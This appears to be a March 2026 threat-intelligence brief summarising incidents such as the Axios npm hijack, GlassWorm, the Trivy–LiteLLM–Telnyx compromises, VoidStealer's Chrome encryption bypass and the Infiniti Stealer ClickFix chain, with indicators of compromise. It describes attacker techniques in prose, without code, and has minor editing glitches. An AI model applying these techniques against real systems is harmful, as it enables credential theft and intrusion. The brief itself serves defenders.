March 2026 Threat Brief 29 Incidents Across MENA, EU, UK & US

. 29 incidents tracked (19 CRITICAL, 12 HIGH)

. 20+ countries affected across MENA, United States, Europe, and United Kingdom

. Top threat actors: ShinyHunters/UNC6240 (5 attacks in brief, 6 including Figure standalone), Handala/Void Manticore (MOIS), MuddyWater/Seedworm (MOIS), TeamPCP, Interlock/Hive0163, UNC5221 (China-nexus), NasirSecurity, Anubis, DragonForce

. Total records confirmed exposed: 686+ million (676M Infutor SSNs + 6.8M Crunchyroll + 5.43M Companies House + 2.7M Navia + 903K Aura + 448K Lloyds)

. Total data volume claimed stolen: 1+ petabyte (TELUS alone) + 326GB (Woflow) + 375TB fabricated (APT IRAN)

. Key themes: ShinyHunters systematic SaaS campaign, Iran multi-front cyber escalation, supply chain credential chaining and npm ecosystem attacks, UK data protection failures, infostealer technical evolution, edge device exploitation, European institutional targeting, information operations vs real operations

Covering: March 1 - March 31, 2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. Axios npm Hijack: North Korea's UNC1069 Weaponized 100M Weekly Downloads via WAVESHAPER.V2

Global | UNC1069 / DPRK (BlueNoroff / Lazarus Group) | March 31, 2026

North Korean threat actor UNC1069 social-engineered the lead Axios maintainer by posing as open-source collaborators, hijacking both his npm and GitHub accounts, and publishing backdoored versions 1.14.1 and 0.30.4 within 39 minutes of each other.

Both injected plain-crypto-js - a malicious dependency pre-staged 18 hours before the attack - that deployed WAVESHAPER.V2, a cross-platform RAT targeting macOS, Windows, and Linux.

Axios has approximately 100 million weekly downloads, 2 million+ dependent packages, and is present in an estimated 80% of cloud environments (Wiz).

GTIG attributed the attack with high confidence based on WAVESHAPER.V2 malware lineage, AstrillVPN-linked C2 infrastructure, and SentinelOne corroboration via macOS binary naming.

Mandiant CTO Charles Carmakal confirmed "hundreds of thousands of stolen credentials" were harvested.

Socket.dev detected the malware within 6 minutes. npm unpublished both versions by ~03:15 UTC. In the approximately 3-hour exposure window, Wiz observed execution in 3% of affected environments.

Singapore CSA issued advisory AD-2026-002 - the first government advisory on the incident.

. Package: axios (npm) - ~100M weekly downloads, 2M+ dependents

. Actor: UNC1069 (GTIG) / BlueNoroff / Lazarus Group - DPRK-nexus, financially motivated

. Malware: WAVESHAPER.V2 (Mandiant taxonomy) - cross-platform RAT

. Malicious Versions: 1.14.1 (00:21 UTC) and 0.30.4 (01:00 UTC) - both branches hit in 39 minutes

. Vector: Social engineering of lead maintainer; npm/GitHub accounts hijacked

. C2: sfrclak[.]com / 142.11.206.73:8000 / campaign ID 6202033 / AstrillVPN infrastructure

. Detection: Socket.dev at 00:05:41 UTC (6 minutes); npm yanked by ~03:15 UTC

. Execution Rate: 3% of affected environments (Wiz)

. Downstream Impact: Hundreds of thousands of stolen credentials (Carmakal/Mandiant)

. Government Response: Singapore CSA advisory AD-2026-002

Sources: Google Cloud Blog, GTIG, Elastic Security Labs, SentinelOne, Mandiant, StepSecurity, Socket.dev, Snyk, Aikido Security, Wiz, Vercel, The Hacker News, The Record, SecurityWeek, SecurityAffairs, Help Net Security, The Register, Cybernews, Techzine Global, CNN, CyberScoop, TechCrunch, Mondoo, Sophos, Trend Micro, Bitdefender, Tenable, SANS Institute, Arctic Wolf, Malwarebytes, npm advisory, CSA Singapore

Full Analysis: https://zerotolerance.me/cyberthreats/axios-npm-supply-chain-attack-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. GlassWorm: 433 Compromised Components Across VSCode, GitHub, and npm

Global | Russian-speaking (assessed) | October 2025 - March 2026

A Russian-speaking threat actor deployed GlassWorm - a self-propagating worm spanning four developer ecosystems simultaneously - across 433 compromised components: 72 OpenVSX and VSCode Marketplace extensions, 151+ GitHub JavaScript/TypeScript repositories, approximately 200 GitHub Python repositories (via the ForceMemo sub-campaign), and 10 npm packages.

GlassWorm uses invisible Unicode characters in the variation selector and extended combining mark ranges to encode malicious payloads that render as blank space in every mainstream code editor and review interface.

The decoded payloads query the Solana blockchain every five seconds for C2 instructions embedded as Base64-encoded JSON objects in transaction memo fields. Google Calendar events and BitTorrent DHT provide fallback C2 channels - making infrastructure takedown nearly impossible.

The final-stage ZOMBI RAT harvests npm, GitHub, OpenVSX, and Git credentials, which it uses to automatically compromise additional packages and extensions, creating a self-sustaining infection cycle.

ZOMBI targets 49 cryptocurrency wallet browser extensions and deploys SOCKS proxy servers and hidden VNC for persistent remote access.

StepSecurity documented 50 Solana C2 transactions between November 2025 and March 2026, with the attacker rotating through six payload server IPs. The March 2026 wave was coordinated across all four platforms simultaneously.

This is the third major supply chain campaign targeting developer infrastructure this month, alongside the Axios npm hijack and TeamPCP's credential chain - each using a different blockchain for C2 (Solana, none, ICP).

. Components: 433 total (72 extensions, 151+ GitHub JS/TS repos, ~200 GitHub Python repos, 10 npm packages)

. C2: Solana blockchain (primary), Google Calendar (fallback), BitTorrent DHT (tertiary)

. Solana Wallet: BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC (50 transactions)

. RAT: ZOMBI - credential theft, 49 crypto wallet extensions, HVNC, SOCKS proxy, WebRTC P2P

. Stealth: Invisible Unicode injection (CVE-2021-42574) - payloads render as blank space

. Self-Propagation: Harvested credentials used to compromise additional packages/repos

. Actor: Russian-speaking (high confidence) - code comments, locale skip, Koi Security exposed endpoint

. Obfuscation: Three-layer - Base64, zlib, XOR (key 134)

Sources: Koi Security, Truesec, Aikido Security (Ilyas Makari), StepSecurity, Socket.dev, Sonatype, BleepingComputer, The Hacker News, SecurityWeek, Dark Reading, CSO Online, InfoWorld, Snyk, Veracode, Fluid Attacks, Malwarebytes, GBHackers, Cloud Security Alliance, Rescana, ThaiCERT, SOCRadar, Scientific American, HotHardware, WinBuzzer, WebProNews, Cybersecurity Help, HackMag, Dev.to, Threat Road (Substack)

Full Analysis: https://zerotolerance.me/cyberthreats/glassworm-supply-chain-campaign-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

2. F5 BIG-IP: Critical RCE Exploited in the Wild After Five-Month Misclassification

Global | UNC5221 (China-nexus) / Unknown | March 30, 2026

F5 reclassified BIG-IP Access Policy Manager vulnerability CVE-2025-53521 from denial-of-service (CVSS 7.5) to unauthenticated remote code execution (CVSS 9.8) in March 2026 - five months after the original October 2025 advisory.

Attackers are deploying memory-resident webshells on compromised devices, disabling SELinux protections, and tampering with sys-eicheck integrity checks to maintain persistent access.

CISA added the flaw to its Known Exploited Vulnerabilities catalog on March 27, ordering all federal agencies to patch by March 30. CISA also issued Emergency Directive ED-26-01 in response to a separate but related incident: UNC5221 (China-nexus) breached F5's corporate network and exfiltrated BIG-IP source code in October 2025. Shadowserver Foundation tracks over 240,000 BIG-IP instances exposed to the public internet.

The five-month misclassification meant organizations that deprioritized a "DoS-only" patch were unknowingly running systems vulnerable to unauthenticated RCE. This is a textbook example of how advisory misclassification creates systemic risk.

. CVE: CVE-2025-53521 (CVSS v3.1: 9.8, CVSS v4.0: 9.3)

. Affected: BIG-IP APM versions 17.5.0-17.5.1, 17.1.0-17.1.2, 16.1.0-16.1.6, 15.1.0-15.1.10

. Reclassification: DoS to unauthenticated RCE after 5 months

. Exposure: 240,000+ BIG-IP instances internet-exposed (Shadowserver)

. CISA KEV: Added March 27; remediation deadline March 30

. F5 Corporate Breach: UNC5221 (China-nexus) stole source code (October 2025)

Sources: BleepingComputer, Help Net Security, CISA KEV Catalog, CISA Emergency Directive ED-26-01, CISA/NSA/Canadian Cyber Centre Malware Analysis Report AR25-338A (December 2025), F5 Security Advisory K000156741, F5 Supplemental IOC Document K000160486, UK National Cyber Security Centre, Dutch National Cyber Security Center, New Zealand NCSC, Canadian Centre for Cyber Security, Resecurity, RH-ISAC, Shadowserver Foundation, NVD (NIST), watchTowr (Benjamin Harris), Defused Cyber, CyberDaily, SecurityAffairs, Zscaler, Rapid7

Full Analysis: https://zerotolerance.me/cyberthreats/f5-big-ip-cve-2025-53521-rce-exploitation

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

3. VoidStealer v2.0: First Infostealer to Bypass Chrome ABE via Hardware Breakpoints

Global | VoidStealer MaaS | March 29, 2026

VoidStealer v2.0 became the first infostealer observed in the wild to bypass Google Chrome's Application-Bound Encryption (ABE) without code injection or privilege escalation.

The technique, disclosed by Gen Digital researcher Vojtech Krejsa on March 19, uses hardware breakpoints via CPU debug registers (DR0/DR7) to intercept Chrome's v20_master_key at the exact moment it exists in plaintext during the os_crypt::DecryptAppBoundString execution flow.

The malware spawns a hidden, suspended Chrome or Edge process, attaches as a debugger, sets hardware breakpoints across all browser threads, and extracts the plaintext key from the R15 register (Chrome) or R14 register (Edge).

Unlike all nine prior stealer families that bypassed ABE within 45 days of its July 2024 release, VoidStealer's technique writes zero bytes to browser memory - making it invisible to memory integrity checks.

The technique was adapted from the open-source ElevationKatz project on GitHub. VoidStealer has undergone 12 iterations from v1.0 (December 2025) to v2.1 (March 2026), demonstrating the rapid development cycle of modern MaaS infostealers.

. Malware: VoidStealer v2.0 (MaaS) - ABE bypass introduced March 13, 2026

. Technique: Hardware breakpoints via DR0/DR7 debug registers - no injection, no escalation

. Key Extraction: v20_master_key from R15 (Chrome) or R14 (Edge) via ReadProcessMemory

. Browser Scope: 20+ Chromium and Gecko-based browsers

. Versions: 12 iterations in 3 months (v1.0 Dec 2025 to v2.1 Mar 2026)

Sources: Gen Digital, BleepingComputer, CSO Online, Computerworld, CybersecurityNews, CyberPress, Cryptika, GBHackers, BlackFog, Elastic Security Labs, SpyCloud, SpecterOps, PCRisk, Xcitium ThreatLabs, The Hacker News, Arabian Post, GitHub (Meckazin/ChromeKatz, xaitax), Google Chrome Developer Documentation, ZERO|TOLERANCE prior coverage (Infiniti Stealer macOS ClickFix Nuitka)

Full Analysis: https://zerotolerance.me/cyberthreats/voidstealer-chrome-abe-bypass-hardware-breakpoints

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

4. Infiniti Stealer: First macOS Infostealer Combining ClickFix Delivery with Nuitka-Compiled Python

macOS / Global | Unknown | March 28, 2026

Malwarebytes disclosed Infiniti Stealer as the first documented macOS campaign combining ClickFix social engineering delivery with a Python 3.11 infostealer compiled via the Nuitka compiler into a native Mach-O binary.

The malware is delivered through a fake Cloudflare CAPTCHA page that tricks users into pasting a base64-obfuscated curl command into macOS Terminal. The command writes a stage-2 loader to /tmp, strips the macOS quarantine attribute, executes via nohup, and self-destructs.

The 8.6MB Nuitka-compiled Mach-O loader decompresses a 35MB zstd archive containing the final payload. env files. It performs anti-analysis checks for VMware, VirtualBox, and sandbox environments.

The Nuitka compilation produces a native binary with no obvious bytecode layer, making reverse engineering significantly harder than PyInstaller alternatives. This campaign arrives amid a 101% increase in macOS infostealer detections reported by Unit 42.

. Malware: Infiniti Stealer (formerly NukeChain) - Nuitka-compiled Python 3.11 Mach-O

. Delivery: ClickFix technique - fake Cloudflare CAPTCHA

. Targets: Chromium + Firefox credentials, macOS Keychain, crypto wallets, .env files

. Anti-Analysis: VM/sandbox detection, randomized execution delay

. Context: 101% increase in macOS stealer detections (Unit 42); 500%+ ClickFix surge 2024-2025

Sources: Malwarebytes, BleepingComputer, CybersecurityNews, GBHackers, Cryptika, Cyber Security Review, Sophos X-Ops, Recorded Future, Palo Alto Networks Unit 42, Microsoft Security Blog, Cyble, Intego, Red Canary, SentinelOne, Check Point Research, Kaspersky

Full Analysis: https://zerotolerance.me/cyberthreats/infiniti-stealer-macos-clickfix-nuitka

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

5. Telnyx SDK Backdoored on PyPI: TeamPCP Hides Credential Stealer in WAV Audio Files

Global | TeamPCP | March 27, 2026

TeamPCP backdoored the Telnyx Python SDK - the official PyPI package for an enterprise communications platform serving Cisco, Philips, and Red Cross - by publishing malicious versions 4.87.1 and 4.87.2 using PyPI credentials stolen during the LiteLLM compromise three days earlier.

This is the third and final link in the Trivy-LiteLLM-Telnyx credential chain. The malicious code introduced a new technique: WAV audio file steganography.

Rather than embedding payloads as base64 blobs, TeamPCP concealed executable code inside the frame data of valid WAV audio files. The files pass MIME-type checks and appear as harmless audio to network inspection tools.

On Windows, the malware extracts a persistent binary from hangup.wav and drops it in the Startup folder.

On Linux and macOS, it extracts a credential harvester from ringtone.wav that sweeps SSH keys, cloud credentials, Kubernetes secrets, Docker and npm tokens, database credentials, and cryptocurrency wallets.

The first version shipped with a case-sensitivity typo that rendered the payload non-functional; TeamPCP corrected it in 16 minutes, indicating active monitoring. PyPI quarantined both versions within 6 hours 22 minutes.

. Malicious Versions: telnyx 4.87.1 (broken), 4.87.2 (functional)

. Monthly Downloads: 730,000

. Exposure Window: 6 hours 22 minutes

. New TTP: WAV audio file steganography (XOR-encrypted payloads in WAV frame data)

. Attribution: TeamPCP (HIGH confidence) - identical RSA-4096 key, tpcp.tar.gz naming

. Campaign Position: Link 3 of 3 (Trivy - LiteLLM - Telnyx)

Sources: Datadog Security Labs, SafeDep, JFrog, Aikido Security, The Hacker News, BleepingComputer, Help Net Security, Infosecurity Magazine, CyberSecurityNews, ReversingLabs, SANS Internet Storm Center (Updates 002 and 003), SANS Institute, Cybernews, Telnyx Security Notice, GitHub Issue #235, pypistats.org, Palo Alto Networks, GitGuardian, Endor Labs, Socket.dev, ZERO|TOLERANCE prior coverage (Trivy Supply Chain CVE-2026-33634, LiteLLM TeamPCP PyPI Supply Chain)

Full Analysis: https://zerotolerance.me/cyberthreats/teampcp-telnyx-pypi-wav-steganography

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

6. Handala Publishes 300+ Emails from FBI Director Patel's Personal Gmail

USA | Handala / Void Manticore / MOIS | March 27-29, 2026

Iran's MOIS-backed Handala published more than 300 emails, personal photographs, and documents stolen from FBI Director Kash Patel's personal Gmail account. TechCrunch verified authenticity by examining DKIM cryptographic signatures in message headers.

A DOJ official separately confirmed to Reuters that the account was breached and the posted material appeared authentic.

The leaked content spans February 2010 to 2022, including travel correspondence, family messages, photos from a trip to Cuba, and a 2016 resume noting a classified CIA award.

One 2014 email shows Patel forwarding DOJ correspondence to his personal Gmail while serving as a national security prosecutor - a practice that violates federal information security policy.

Handala framed the operation as direct retaliation for the March 19 DOJ seizure of four Handala domains and the State Department's $10 million Rewards for Justice bounty. Patel's Gmail appeared in 11 prior data breaches on Have I Been Pwned.

Security researchers assessed credential stuffing or password reuse as the likely compromise vector.

This represents the third major Handala operation in March (medical device company, Lockheed Martin engineers, FBI Director) - an unprecedented escalation tempo for a single MOIS-backed group.

. Leaked Data: 300+ personal emails, photographs, documents (Feb 2010 - 2022)

. Target: FBI Director Kash Patel's personal Gmail (not government systems)

. Authentication: DKIM-verified by TechCrunch; DOJ confirmed to Reuters

. HIBP Exposure: Gmail address found in 11 prior data breaches

. Assessed Vector: Credential stuffing / password reuse

. Motivation: Retaliation for DOJ domain seizure and $10M bounty

. Escalation Arc: Medical device company (Mar 11) - Lockheed Martin engineers (mid-Mar) - FBI Director (Mar 27)

Sources: NBC News, CNN, TechCrunch, Axios, PBS/AP, CBS News, Reuters, Al Jazeera, CNBC, Fox News, Newsweek, Fortune, GV Wire, SiliconANGLE, SecurityAffairs, Check Point Research, GovInfoSecurity, Cyberwarzone, Risky Business, Lawfare, Haaretz, Jerusalem Post, Engadget, Techlicious, This Week in Security, Cyber Daily, FBI.gov, DOJ Office of Public Affairs, ZERO|TOLERANCE prior coverage ()

Full Analysis: https://zerotolerance.me/cyberthreats/handala-fbi-director-patel-gmail-hack

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

7. DarkSword: iOS Zero-Day Exploit Chain Targets Saudi, Turkey, Malaysia, Ukraine

Saudi Arabia / Turkey / Malaysia / Ukraine | UNC6748, PARS Defense, UNC6353 | March 26, 2026

Google Threat Intelligence Group, iVerify, and Lookout identified DarkSword - a full iOS exploit chain using 6 vulnerabilities including 3 zero-days (CVE-2026-20700, CVE-2025-43529, CVE-2025-14174) to achieve complete iPhone device compromise.

Three independent operators deployed DarkSword since November 2025: UNC6748 (financially motivated, Saudi Arabia), PARS Defense (Turkish commercial surveillance vendor, Turkey and Malaysia), and UNC6353 (suspected Russian espionage, Ukraine).

DarkSword operates as a non-persistent smash-and-grab infostealer targeting messages, credentials, and cryptocurrency wallets.

On March 23, 2026, the full exploit kit was leaked on GitHub. All vulnerabilities were patched by Apple between mid-2025 and February 2026, but an estimated 270 million iPhones remained on vulnerable iOS versions at time of disclosure.

Apple Lockdown Mode was confirmed effective on unpatched devices. The leak transforms a targeted surveillance tool into a commodity exploit available to any actor with moderate technical capability.

. Vulnerabilities: 6 (3 zero-days) across iOS 18.4 through 18.7

. Malware Families: GHOSTBLADE, GHOSTKNIFE, GHOSTSABER

. Countries: Saudi Arabia, Turkey, Malaysia, Ukraine

. Exploit Kit: Leaked on GitHub March 23, 2026

. Vulnerable Devices: ~270 million iPhones on unpatched iOS versions

Sources: Google Cloud Blog (GTIG), iVerify, Lookout, The Hacker News, BleepingComputer, Help Net Security, SecurityWeek, Dark Reading, TechCrunch, CyberScoop, Apple Security Advisories, CISA KEV, Malwarebytes, WinBuzzer

Full Analysis: https://zerotolerance.me/cyberthreats/darksword-ios-exploit-chain-saudi

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

8. Navia Benefit Solutions: 2.7M Records Exposed via BOLA API Flaw

USA | Unknown | March 26, 2026

A Broken Object Level Authorization (BOLA) vulnerability in Navia Benefit Solutions' API exposed 2,697,540 benefit plan participant records over a 24-day intrusion window from December 22, 2025 to January 15, 2026. Navia administers FSAs, HRAs, COBRA, and HSAs for over 10,000 employer clients.

Exposed data includes Social Security numbers, dates of birth, addresses, enrollment records, dependent information, and seven years of benefit plan participation history dating to 2018.

Among the downstream victims: 287 HackerOne employees and approximately 35,600 Washington State health plan members. HackerOne publicly criticized Navia for notification delays exceeding six weeks. At least nine federal class action lawsuits have been filed.

BOLA is the number one vulnerability on OWASP's API Security Top 10, and this incident demonstrates how a single API authorization flaw in a benefits administrator can cascade SSNs across thousands of employer organizations.

. Individuals Affected: 2,697,540

. Intrusion Window: 24 days (Dec 22, 2025 - Jan 15, 2026)

. Vulnerability: BOLA - OWASP API Security #1

. Data Exposed: SSNs, DOBs, addresses, enrollment records, dependent info, HRA/FSA/COBRA records

. Downstream Victims: HackerOne (287 employees), Washington HCA (~35,600 members)

. Class Actions: At least 9 federal lawsuits filed

Sources: BleepingComputer, The Register, SecurityWeek, Security Affairs, HIPAA Journal, ClassAction.org, Washington State Health Care Authority, WA HCA FAQ (HCA 50-0132), WA HCA GovDelivery Bulletin, CyberSecurityNews, Paubox, GlobeNewswire, Justia Federal Court Dockets (Western District of Washington), Law.com Radar, ClaimDepot, SC Media, TechRadar, CyberNews, CPO Magazine, TechRepublic, The Lyon Firm, DEV Community

Full Analysis: https://zerotolerance.me/cyberthreats/navia-benefit-solutions-bola-api-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

9. NasirSecurity: Pro-Iranian Group Targets Gulf Energy Supply Chains

UAE / Oman / Iraq / Saudi Arabia | NasirSecurity | March 26, 2026

Pro-Iranian threat actor NasirSecurity - operating under rotating aliases including Sons of Hezbollah Lebanon, Sons of Al-Nusayr, and Al-Nasir Resistance - claimed breaches of four Gulf energy companies: Dubai Petroleum (UAE), CC Energy Development (Oman), an unnamed Iraqi oil and gas firm, and Al-Safi Oil Company (Saudi Arabia).

The group claimed 827 GB of exfiltrated data.

Resecurity's investigation revealed the critical finding: the group did not breach any of the energy majors directly.

All stolen data originated from third-party supply chain vendors - contractors and subcontractors involved in engineering, safety, and construction - who serve the energy sector. The group then presented the stolen documents as if obtained from the energy companies themselves.

Despite the inflated claims, the authentic documents - engineering schematics, construction contracts, risk assessments, and fire safety vendor records - could provide adversaries with a roadmap for planning physical attacks on Gulf energy infrastructure.

This is a distinct operation from the Handala and MuddyWater campaigns, establishing at least three concurrent Iranian-aligned cyber operations in March 2026.

. Claimed Victims: 4 (Dubai Petroleum, CC Energy Development, unnamed Iraqi firm, Al-Safi Oil)

. Claimed Data: 827 GB (assessed as overstated by Resecurity)

. Actual Vector: Supply chain compromise via BEC and spear phishing of third-party contractors

. Activity Period: October 2025 - March 2026

Sources: Resecurity, Security Affairs, The420.in, Dark Reading, Ransomware.live, RansoLook.io, WatchGuard, HookPhish, Hackmanac, ZERO|TOLERANCE OSINT Investigation

Full Analysis: https://zerotolerance.me/cyberthreats/nasirsecurity-gulf-energy-supply-chain

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

10. Trivy Supply Chain Attack: Security Scanner Weaponized, 1,000+ Cloud Environments Infected

Global | TeamPCP (DeadCatx3/PCPcat/ShellForce) | Feb 28 - Mar 25, 2026

Two-phase attack: February 28 (hackerbot-claw exploited pull_request_target misconfiguration to steal a GitHub Personal Access Token) and March 19 (main attack after surviving a non-atomic credential rotation).

TeamPCP force-pushed 76 of 77 trivy-action tags to credential-stealing malware, poisoned Docker images across Docker Hub, GHCR, and ECR, and deployed CanisterWorm - a self-propagating npm worm using ICP blockchain canisters for command and control, the first documented use of this technique.

The credential stealer bypassed GitHub Actions log-masking via /proc/pid/mem. The campaign cascaded into Checkmarx KICS (35 tags), LiteLLM PyPI (95M monthly downloads), and a geopolitically-targeted Kubernetes wiper destroying Iranian systems.

44 Aqua Security internal repos were defaced. Mandiant CTO stated at RSA Conference 2026 that 1,000+ SaaS environments were compromised, with projections exceeding 10,000.

This is the first link in the Trivy-LiteLLM-Telnyx credential chain - the most significant software supply chain campaign of 2026.

. CVE: CVE-2026-33634 (CVSS v4: 9.4, NVD v3.1: 8.8, vendor v3.1: 9.9, CWE-506)

. Infected: 1,000+ cloud environments (Mandiant); projected 10,000+

. Ecosystems: 5 (GitHub Actions, Docker Hub, npm, Open VSX, PyPI)

. Tags Hijacked: 76/77 (trivy-action) + 7 (setup-trivy) + 35 (Checkmarx KICS)

. Actor: TeamPCP (60,000+ servers in Dec 2025 campaign; hybrid motivation including anti-Iran wiper)

Sources: The Hacker News, The Register, BleepingComputer, Infosecurity Magazine, SecurityWeek, CyberScoop, Dark Reading, Microsoft Security Blog, Aqua Security, Wiz, Palo Alto Networks (Prisma Cloud), CrowdStrike, Socket.dev, StepSecurity, GitGuardian, Mandiant (Google Cloud), Orca Security, Aikido Security, Mend.io, Snyk, ReversingLabs, Datadog Security Labs, Endor Labs, Arctic Wolf, Kaspersky, Sysdig, Cloud Security Alliance, Checkmarx, Docker, GitHub Advisory (GHSA-69fq-xp46-6x23), Tenable (NVD), ZERO|TOLERANCE Independent OSINT Verification (March 27, 2026)

Full Analysis: https://zerotolerance.me/cyberthreats/trivy-supply-chain-cve-2026-33634

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

11. LiteLLM PyPI Backdoor: AI Framework with 480M Downloads Compromised by TeamPCP

Global | TeamPCP | March 24, 2026

TeamPCP compromised LiteLLM - an AI/LLM proxy framework with approximately 480 million total PyPI downloads - using credentials stolen during the Trivy supply chain attack. This is the second link in the Trivy-LiteLLM-Telnyx credential chain.

The malicious package versions contained a credential harvester targeting cloud API keys, AWS credentials, database connection strings, and AI model API tokens.

The attack exploited the trust relationship between open-source AI tooling and production environments where LiteLLM commonly runs as a middleware layer between applications and LLM providers.

LiteLLM's position in AI infrastructure makes this particularly dangerous: organizations using it as a proxy to OpenAI, Anthropic, Azure, and other LLM providers expose API keys worth thousands of dollars per month.

The compromise was detected through anomalous PyPI publishing patterns and community vigilance.

. Package: litellm (PyPI)

. Downloads: ~480M total / ~95M monthly

. Vector: Stolen credentials from Trivy compromise (credential chaining)

. Payload: Credential harvester targeting cloud and AI API keys

. Actor: TeamPCP (same campaign as Trivy and Telnyx)

. Campaign Position: Link 2 of 3 (Trivy - LiteLLM - Telnyx)

Sources: Datadog Security Labs, Wiz, ReversingLabs, The Hacker News, Kaspersky, Snyk, LiteLLM Official Blog (docs.litellm.ai/blog/security-update-march-2026), Palo Alto Networks, The Register, Endor Labs, Help Net Security, Mandiant, Microsoft Security Blog, Aqua Security, CrowdStrike, Socket.dev, StepSecurity, Aikido Security, ZERO|TOLERANCE Independent OSINT Verification (March 27, 2026)

Full Analysis: https://zerotolerance.me/cyberthreats/litellm-teampcp-pypi-supply-chain

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

12. European Commission: ShinyHunters Claim 350GB AWS Cloud Breach - Second Hack in Two Months

EU | ShinyHunters | March 24-29, 2026

The European Commission - the body that drafted and enforces GDPR - was breached for the second time in under two months. On March 24, attackers compromised at least one AWS account hosting the Commission's Europa.eu web platform.

ShinyHunters posted the claim on March 28, alleging 350+ GB of data including mail server dumps, database exports, confidential documents, and contracts.

" AWS stated: "AWS did not experience a security event" - confirming the failure was in the Commission's own account configuration.

This follows the January 30 breach in which attackers exploited Ivanti EPMM zero-days (CVE-2026-1281, CVE-2026-1340) to compromise the Commission's MDM infrastructure.

The regulatory framework governing EU institution breaches is Regulation (EU) 2018/1725 (not GDPR), supervised by the EDPS. Two breaches of the GDPR enforcer in under two months severely undermines the Commission's credibility on data protection enforcement.

. Claimed Data: 350+ GB (mail servers, databases, documents, contracts)

. Target: Europa.eu AWS cloud infrastructure

. Actor: ShinyHunters (UNC6040/UNC6240/UNC6395)

. EC Confirmation: "Data have been taken from those websites"

. Prior Breach: Jan 30 - MDM breach via Ivanti zero-days

. Staff Count: ~32,000 employees

Sources: BleepingComputer, TechCrunch, Bloomberg, SecurityAffairs, Hackread, Cybernews, CyberKendra, RedPacket Security, Engadget, IBTimes SG, CSO Online, CybersecurityNews, Computing.co.uk, BrightDefense, HelpNetSecurity, The Record, EDPS, EUR-Lex, CERT-EU Advisory (Cyber Brief 26-03), Rapid7, Ivanti Advisory, CISA KEV, GreyNoise, Google Cloud Blog (Mandiant), Obsidian Security, Wikipedia, Stibbe, Mayer Brown

Full Analysis: https://zerotolerance.me/cyberthreats/european-commission-aws-shinyhunters-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

13. APT IRAN's 375TB Lockheed Martin Claim: Fabricated Data Dump, Real Information Operation

USA / Israel | APT IRAN (self-named) / Handala | March 20-30, 2026

A group calling itself "APT IRAN" - a low-tier pro-Iranian hacktivist collective with a self-assigned name, not a recognized APT group - claimed on March 20 to have exfiltrated 375 terabytes from Lockheed Martin and demanded more than $400 million in ransom.

The data was listed on "THREAT MARKET," an obscure onion marketplace absent from every major dark web tracker, with a stated exclusive buyout price of $598.5 million. After ten days, zero verified data samples have been released. Lockheed Martin denied the claim twice.

No SEC 8-K filing, no CISA advisory, and no law enforcement statement has been issued. " For context, the documented Chinese theft of F-35 data via Snowden-documented operations exfiltrated approximately 50TB over years.

Separately, on March 26, the real MOIS-backed Handala group launched "Operation Lockheed Martin," publishing passport scans and personal details of 28 Lockheed Martin engineers working in Israel on F-35, F-22, and THAAD programs, accompanied by death threats.

The two operations - one fabricated, one verified - create amplified psychological impact. Whether coordinated or opportunistic, the strategic effect serves Iran's wartime information warfare objectives.

Distinguishing fabricated claims from real operations is itself an intelligence requirement.

. APT IRAN Claim: 375TB Lockheed Martin data (UNVERIFIED - zero samples released after 10 days)

. Marketplace: THREAT MARKET - not tracked by any major dark web tracker

. Pricing: $374.8M total value / $598.5M exclusive buyout (theatrical)

. Lockheed Martin: Two denials, no SEC 8-K, no CISA advisory

. Handala Operation: 28 engineers doxxed with passport scans, death threats (VERIFIED - real)

. Programs Exposed: F-35, F-22, THAAD

Sources: Hackread, Cybersecurity Dive, SC Media, Cyber Daily, UpGuard, CyberNews, Security Boulevard, Netcrook, ThreatBeat, CyberHub Podcast (James Azar), Palo Alto Networks Unit 42, SOCRadar, Check Point Research, Krebs on Security, DarkWebInformer (@DailyDarkWeb), Lockheed Martin official statements, CSIS, The Diplomat (F-35/Snowden context), ZERO|TOLERANCE prior coverage (Handala FBI Director Patel Gmail Hack)

Full Analysis: https://zerotolerance.me/cyberthreats/apt-iran-lockheed-martin-375tb-fabrication

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

15. TELUS Digital: ShinyHunters Steal 1 Petabyte via Stolen GCP Credentials

Canada / Global | ShinyHunters (UNC6040/UNC6395) / SLH Collective | March 12, 2026

TELUS Digital (US$2.658B revenue, ~79,000 employees, 35+ countries) confirmed a multi-month breach by ShinyHunters. The attack chain began with GCP credentials discovered in Salesloft Drift supply chain breach data from August 2025 (760 companies affected).

Credential scanning via Trufflehog led to BigQuery access, then lateral movement across TELUS systems over an estimated 5-7 months.

Stolen data spans customer support tickets, voice recordings, FBI background checks, source code, AI training datasets, financial records, call detail records, and fraud detection systems for at least 28 BPO client companies.

ShinyHunters demanded $65 million in ransom - TELUS did not engage. TELUS Corp stock dropped 6.8% post-disclosure.

This is the largest confirmed data breach by volume in 2026 to date, and demonstrates how a single supply chain credential compromise can cascade across an entire business process outsourcing ecosystem.

. Data Stolen: ~1 Petabyte (700TB-1PB) from 28 alleged client companies

. Ransom Demand: $65,000,000 (not paid)

. Vector: Supply chain credential pivot from Salesloft Drift - GCP - BigQuery

. Dwell Time: Estimated 5-7 months

. Actor: ShinyHunters / UNC6040 / UNC6395 (SLH collective since Aug 2025)

